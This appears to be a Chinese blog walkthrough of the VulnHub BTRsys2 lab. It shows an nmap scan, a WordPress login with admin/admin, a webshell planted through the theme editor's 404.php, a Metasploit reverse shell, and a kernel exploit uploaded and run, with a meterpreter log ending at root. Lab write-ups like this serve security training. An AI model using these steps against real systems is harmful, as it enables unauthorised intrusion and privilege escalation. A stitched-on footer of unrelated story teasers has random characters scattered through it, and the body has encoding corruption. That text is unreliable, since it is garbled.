BTRsys2

VulnHub靶機滲透之BTRsys2

1.信息收集 發(fā)現(xiàn)主機IP為192.168.65.132

2.nmap端口掃描nmap -T4 -A -v 192.168.65.132

3.訪問80端口 進(jìn)行目錄掃描

4.訪問robots.txt 發(fā)現(xiàn)wordlist

5.login處嘗試弱密碼登陸 登陸成功(username=admin passwd=admin)

image-20210309233542575.png
image-20210309233553818.png

6.Posts處發(fā)現(xiàn)文件上傳 上傳失敗


7.appearance處發(fā)現(xiàn)editor 可編輯PHP



8.寫入一句話木馬 訪問http://192.168.65.132/wordpress/wp-content/themes/twentyfourteen/404.php 蟻劍連接成功


8.msf反彈shell


9.提權(quán)

9.1 查看當(dāng)前系統(tǒng)信息



9.2查找內(nèi)核漏洞




9.3 編譯上傳 提權(quán)成功
meterpreter > upload /home/kali/Desktop/exploit
[*] uploading  : /home/kali/Desktop/exploit -> exploit
[*] Uploaded -1.00 B of 23.22 KiB (-0.0%): /home/kali/Desktop/exploit -> exploit
[*] uploaded   : /home/kali/Desktop/exploit -> exploit
meterpreter > shell
Process 1286 created.
Channel 3 created.
pwd
/var/www/html/wordpress/wp-content/themes/twentyfourteen
ls -lh
total 832K
-rwxrwxrwx 1 btrisk       1000 1.1K Mar  9 08:40 404.php
-rw-r--r-- 1 www-data www-data  17K Mar  9 08:49 41458.c 
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 archive.php
-rwxrwxrwx 1 btrisk       1000 1.9K Oct 12  2016 author.php
-rwxrwxrwx 1 btrisk       1000 1.5K Oct 12  2016 category.php
-rwxrwxrwx 1 btrisk       1000 2.3K Oct 12  2016 comments.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-aside.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-audio.php
-rwxrwxrwx 1 btrisk       1000 1.1K Oct 12  2016 content-featured-post.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-gallery.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-image.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-link.php
-rwxrwxrwx 1 btrisk       1000  961 Oct 12  2016 content-none.php
-rwxrwxrwx 1 btrisk       1000  871 Oct 12  2016 content-page.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-quote.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-video.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 css
-rw-r--r-- 1 www-data www-data  24K Mar  9 08:59 exploit
-rwxrwxrwx 1 btrisk       1000  946 Oct 12  2016 featured-content.php
-rwxrwxrwx 1 btrisk       1000  728 Oct 12  2016 footer.php
-rwxrwxrwx 1 btrisk       1000  16K Oct 12  2016 functions.php
drwxrwxrwx 3 btrisk       1000 4.0K Apr 24  2017 genericons
-rwxrwxrwx 1 btrisk       1000 2.3K Oct 12  2016 header.php
-rwxrwxrwx 1 btrisk       1000 2.6K Oct 12  2016 image.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 images
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 inc
-rwxrwxrwx 1 btrisk       1000 1.6K Oct 12  2016 index.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 js
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 languages
drwxrwxrwx 2 btrisk       1000 4.0K Apr 28  2017 page-templates
-rwxrwxrwx 1 btrisk       1000 1.2K Oct 12  2016 page.php
-rwxrwxrwx 1 btrisk       1000  16K Oct 12  2016 rtl.css
-rwxrwxrwx 1 btrisk       1000 603K Oct 12  2016 screenshot.png
-rwxrwxrwx 1 btrisk       1000 1.3K Oct 12  2016 search.php
-rwxrwxrwx 1 btrisk       1000  340 Oct 12  2016 sidebar-content.php
-rwxrwxrwx 1 btrisk       1000  395 Oct 12  2016 sidebar-footer.php
-rwxrwxrwx 1 btrisk       1000  848 Oct 12  2016 sidebar.php
-rwxrwxrwx 1 btrisk       1000 1.1K Oct 12  2016 single.php
-rwxrwxrwx 1 btrisk       1000 5.6K Mar  7 21:36 style.css
-rwxrwxrwx 1 btrisk       1000 1.6K Oct 12  2016 tag.php
-rwxrwxrwx 1 btrisk       1000 2.4K Oct 12  2016 taxonomy-post_format.php
chmod 777 exp*
./exp*
bash: cannot set terminal process group (840): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/var/www/html/wordpress/wp-content/themes/twentyfourteen#
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末盏浙,一起剝皮案震驚了整個濱河市劈伴,隨后出現(xiàn)的幾起案子窿侈,更是在濱河造成了極大的恐慌喇伯,老刑警劉巖鸯两,帶你破解...
    沈念sama閱讀 217,734評論 6 505
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件熊经,死亡現(xiàn)場離奇詭異德崭,居然都是意外死亡福铅,警方通過查閱死者的電腦和手機荔睹,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,931評論 3 394
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門狸演,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人僻他,你說我怎么就攤上這事宵距。” “怎么了吨拗?”我有些...
    開封第一講書人閱讀 164,133評論 0 354
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵满哪,是天一觀的道長。 經(jīng)常有香客問我劝篷,道長哨鸭,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,532評論 1 293
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任娇妓,我火速辦了婚禮兔跌,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘峡蟋。我一直安慰自己坟桅,他們只是感情好华望,可當(dāng)我...
    茶點故事閱讀 67,585評論 6 392
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著仅乓,像睡著了一般赖舟。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上夸楣,一...
    開封第一講書人閱讀 51,462評論 1 302
  • 城市分裂傳說
    那天宾抓,我揣著相機與錄音,去河邊找鬼豫喧。 笑死石洗,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的紧显。 我是一名探鬼主播讲衫,決...
    沈念sama閱讀 40,262評論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼孵班!你這毒婦竟也來了涉兽?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,153評論 0 276
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤篙程,失蹤者是張志新(化名)和其女友劉穎枷畏,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體虱饿,經(jīng)...
    沈念sama閱讀 45,587評論 1 314
  • ?護(hù)林員之死
    正文 獨居荒郊野嶺守林人離奇死亡拥诡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,792評論 3 336
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了氮发。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片袋倔。...
    茶點故事閱讀 39,919評論 1 348
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖折柠,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情批狐,我是刑警寧澤扇售,帶...
    沈念sama閱讀 35,635評論 5 345
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布,位于F島的核電站嚣艇,受9級特大地震影響承冰,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜食零,卻給世界環(huán)境...
    茶點故事閱讀 41,237評論 3 329
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一困乒、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧贰谣,春花似錦娜搂、人聲如沸迁霎。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,855評論 0 22
  • 一樁弒父案百宇,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽考廉。三九已至,卻和暖如春携御,著一層夾襖步出監(jiān)牢的瞬間昌粤,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,983評論 1 269
  • 情欲美人皮
    我被黑心中介騙來泰國打工啄刹, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留涮坐,地道東北人。 一個月前我還...
    沈念sama閱讀 48,048評論 3 370
  • 代替公主和親
    正文 我出身青樓誓军,卻偏偏與公主長得像袱讹,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子谭企,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,864評論 2 354

推薦閱讀更多精彩內(nèi)容